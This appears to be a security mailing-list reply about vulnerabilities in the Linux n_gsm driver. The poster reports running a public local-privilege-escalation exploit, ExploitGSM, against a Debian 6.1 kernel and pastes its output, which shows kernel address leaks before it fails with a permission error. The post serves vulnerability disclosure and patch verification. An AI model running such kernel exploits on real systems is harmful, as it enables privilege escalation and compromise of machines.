Am 16.04.24 um 22:16 schrieb Solar Designer:
I'm puzzled by the lack of follow-ups on this, but anyway @FFFVR_
tweeted they also found (more) vulnerabilities in the n_gsm driver:
FWIW, YuriiCrimson's bug for 5.15 - 6.1 seems to be patched on current
Debian:
debianexploitgsm:/tmp/ExploitGSM/ExploitGSM_5_15_to_6_1$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-20-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65900116
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address -> ffffffff8546f1c0
text leaked address -> ffffffff83400000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
gsm_mux_event_offset -> 56
Error set line discipline N_GSM, Operation not permitted
--cku
